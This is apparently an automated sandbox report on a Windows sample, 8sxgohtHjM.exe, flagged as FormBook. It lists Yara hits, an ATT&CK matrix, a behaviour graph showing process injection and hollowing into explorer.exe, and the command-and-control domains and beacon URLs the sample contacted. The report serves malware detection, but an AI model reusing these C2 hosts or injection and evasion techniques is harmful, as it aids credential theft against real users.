          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383831 Sample: 8sxgohtHjM.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 28 www.trumedenroll.com 2->28 30 www.siloamtree.com 2->30 32 2 other IPs or domains 2->32 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 7 other signatures 2->48 9 8sxgohtHjM.exe 3 2->9         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\8sxgohtHjM.exe.log, ASCII 9->26 dropped 60 Tries to detect virtualization through RDTSC time measurements 9->60 62 Injects a PE file into a foreign processes 9->62 13 8sxgohtHjM.exe 9->13         started        16 8sxgohtHjM.exe 9->16         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 13->64 66 Maps a DLL or memory area into another process 13->66 68 Sample uses process hollowing technique 13->68 70 Queues an APC in another process (thread injection) 13->70 18 explorer.exe 13->18 injected process9 dnsIp10 34 bestwishesforyou.online 152.44.33.193, 49744, 80 UPCLOUDUSAUS United States 18->34 36 www.support-applela.com 91.121.60.23, 80 OVHFR France 18->36 38 14 other IPs or domains 18->38 50 System process connects to network (likely due to code injection or exploit) 18->50 52 Uses netstat to query active network connections and open ports 18->52 22 NETSTAT.EXE 12 18->22         started        signatures11 process12 dnsIp13 40 www.support-applela.com 22->40 54 Modifies the context of a thread in another process (thread injection) 22->54 56 Maps a DLL or memory area into another process 22->56 58 Tries to detect virtualization through RDTSC time measurements 22->58 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          8sxgohtHjM.exe35%VirustotalBrowse
          8sxgohtHjM.exe33%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
          8sxgohtHjM.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.8sxgohtHjM.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.bestwishesforyou.online/vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqT0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.unclejoeandkamala2020.com/vu9b/?0pn=ZRZicPUHGdpu447/ToshtXbk+LjFT6TcRbqWThirrcjgIxqMd1CJhqCrqkTzpGUGM9/e&uZQL2=D48x0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.nfoptic.com/vu9b/?0pn=TnflO2yLdbi4Ns0f55IiNebWCRsDsubrkj3vpv5xkUkHd7zC3bp6KG+yVlLNRE0xHemI&uZQL2=D48x0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.pone2.com/vu9b/?uZQL2=D48x&0pn=4FRBZlZfmJP1ouB3qG1kZTmIcoiAlBFvqheXtdIBznGFOOcTf1arb+p8J++3khIBMjQo0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.paintersdistrictcouncil.com/vu9b/0%Avira URL Cloudsafe
          http://www.support-applela.com/vu9b/?0pn=31nFjjjg4oAcb4MokEe100%Avira URL Cloudphishing
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.nahomredda.com/vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHq0%Avira URL Cloudsafe
          http://www.siloamtree.com/vu9b/?uZQL2=D48x&0pn=XOyfHYtLU1lLdZnaXZe4OvPQMiRanaHMlAIcsSmWFWkLxOIqqTB9rasY28K6kY36/QRI0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.newmandu.com/?fp=teRCGBRWnsMyQPYBLQzITP%2FRZhRM%2BzRVkHY6lKODoxW9UBFBZ%2BAUTjJBDU4IosgaQp0%Avira URL Cloudsafe
          http://www.newmandu.com/vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          3.13.255.157
          truefalse
            high
            trumedenroll.com
            184.168.131.241
            truetrue
              unknown
              cname.landingi.com
              108.128.238.226
              truefalse
                high
                www.newmandu.com
                208.91.197.91
                truetrue
                  unknown
                  nfoptic.com
                  34.102.136.180
                  truefalse
                    unknown
                    www.support-applela.com
                    91.121.60.23
                    truetrue
                      unknown
                      siloamtree.com
                      34.102.136.180
                      truefalse
                        unknown
                        unclejoeandkamala2020.com
                        34.102.136.180
                        truefalse
                          unknown
                          bestwishesforyou.online
                          152.44.33.193
                          truetrue
                            unknown
                            www.pvplearing.net
                            unknown
                            unknowntrue
                              unknown
                              www.siloamtree.com
                              unknown
                              unknowntrue
                                unknown
                                www.paintersdistrictcouncil.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.bancosecurity.website
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.bestwishesforyou.online
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.pone2.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.trumedenroll.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.evonnemccray.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.nfoptic.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.unclejoeandkamala2020.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.nahomredda.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.bestwishesforyou.online/vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqTtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.unclejoeandkamala2020.com/vu9b/?0pn=ZRZicPUHGdpu447/ToshtXbk+LjFT6TcRbqWThirrcjgIxqMd1CJhqCrqkTzpGUGM9/e&uZQL2=D48xfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.nfoptic.com/vu9b/?0pn=TnflO2yLdbi4Ns0f55IiNebWCRsDsubrkj3vpv5xkUkHd7zC3bp6KG+yVlLNRE0xHemI&uZQL2=D48xfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.pone2.com/vu9b/?uZQL2=D48x&0pn=4FRBZlZfmJP1ouB3qG1kZTmIcoiAlBFvqheXtdIBznGFOOcTf1arb+p8J++3khIBMjQotrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  www.paintersdistrictcouncil.com/vu9b/true
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.nahomredda.com/vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHqtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.siloamtree.com/vu9b/?uZQL2=D48x&0pn=XOyfHYtLU1lLdZnaXZe4OvPQMiRanaHMlAIcsSmWFWkLxOIqqTB9rasY28K6kY36/QRIfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.newmandu.com/vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48xtrue
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.08sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersG8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bThe8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers?8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://www.gnu.org/licenses/8sxgohtHjM.exefalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name48sxgohtHjM.exe, 00000000.00000002.270751775.000000000271E000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.tiro.comexplorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.goodfont.co.kr8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.carterandcone.coml8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sajatypeworks.com8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.typography.netD8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlN8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cThe8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htm8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://fontfabrik.com8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cn8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.html8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.support-applela.com/vu9b/?0pn=31nFjjjg4oAcb4MokEeNETSTAT.EXE, 00000010.00000002.521546345.00000000036FA000.00000004.00000020.sdmptrue
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
